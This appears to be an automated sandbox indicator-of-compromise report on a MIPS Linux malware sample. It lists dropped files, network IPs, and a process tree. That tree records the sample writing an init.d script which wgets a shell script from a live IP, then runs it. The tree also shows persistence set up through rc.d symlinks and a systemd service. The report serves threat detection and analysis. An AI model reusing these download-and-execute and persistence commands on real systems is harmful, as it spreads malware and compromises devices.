IOC Report
mipsel.nn.elf

Files

File Path | Type | Category | Malicious
mipsel.nn.elf | ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped | initial sample | malicious
/etc/init.d/mipsel.nn.elf | POSIX shell script, ASCII text executable | dropped | malicious
/etc/init.d/system | POSIX shell script, ASCII text executable | dropped | malicious
/etc/profile | ASCII text | dropped | malicious
/etc/rc.local | POSIX shell script, ASCII text executable | dropped | malicious
/boot/bootcmd | ASCII text | dropped | -
/etc/inittab | ASCII text | dropped | -
/etc/motd | ASCII text | dropped | -
/etc/systemd/system/custom.service | ASCII text | dropped | -
/memfd:snapd-env-generator (deleted) | ASCII text | dropped | -
/tmp/qemu-open.EBsJ7m (deleted) | ASCII text, with no line terminators | dropped | -

Processes

Path | Cmdline | Malicious
/tmp/mipsel.nn.elf | /tmp/mipsel.nn.elf | -
/tmp/mipsel.nn.elf | - | -
/bin/sh | sh -c "systemctl enable custom.service >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/systemctl | systemctl enable custom.service | -
/tmp/mipsel.nn.elf | - | -
/bin/sh | sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/chmod | chmod +x /etc/init.d/system | -
/tmp/mipsel.nn.elf | - | -
/bin/sh | sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/ln | ln -s /etc/init.d/system /etc/rcS.d/S99system | -
/tmp/mipsel.nn.elf | - | -
/bin/sh | sh -c "echo \"#!/bin/sh\n# /etc/init.d/mipsel.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mipsel.nn.elf'\n /tmp/mipsel.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mipsel.nn.elf'\n killall mipsel.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mipsel.nn.elf" | -
/tmp/mipsel.nn.elf | - | -
/bin/sh | sh -c "chmod +x /etc/init.d/mipsel.nn.elf >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/chmod | chmod +x /etc/init.d/mipsel.nn.elf | -
/tmp/mipsel.nn.elf | - | -
/bin/sh | sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/mkdir | mkdir -p /etc/rc.d | -
/tmp/mipsel.nn.elf | - | -
/bin/sh | sh -c "ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf >/dev/null 2>&1" | -
/bin/sh | - | -
/usr/bin/ln | ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf | -
/tmp/mipsel.nn.elf | - | -
/tmp/mipsel.nn.elf | - | -
/usr/lib/udisks2/udisksd | - | -
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 | -
/usr/lib/systemd/systemd | - | -
/usr/lib/systemd/system-environment-generators/snapd-env-generator | /usr/lib/systemd/system-environment-generators/snapd-env-generator | -
/usr/lib/udisks2/udisksd | - | -
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 | -
/usr/lib/udisks2/udisksd | - | -
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 | -
/usr/bin/dash | - | -
/usr/bin/rm | rm -f /tmp/tmp.aMCx9Fums0 /tmp/tmp.JCLTTmWabl /tmp/tmp.SRiGvKqYas | -
/usr/bin/dash | - | -
/usr/bin/rm | rm -f /tmp/tmp.aMCx9Fums0 /tmp/tmp.JCLTTmWabl /tmp/tmp.SRiGvKqYas | -

URLs

Name | IP | Malicious
http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s | unknown | -
http://94.156.227.233/ | unknown | -

IPs

IP | Domain | Country | Malicious
54.171.230.55 | unknown | United States | -
109.202.202.202 | unknown | Switzerland | -
94.156.227.234 | unknown | Bulgaria | -
91.189.91.43 | unknown | United Kingdom | -
91.189.91.42 | unknown | United Kingdom | -

Memdumps

Base Address | Region type | Protect | Malicious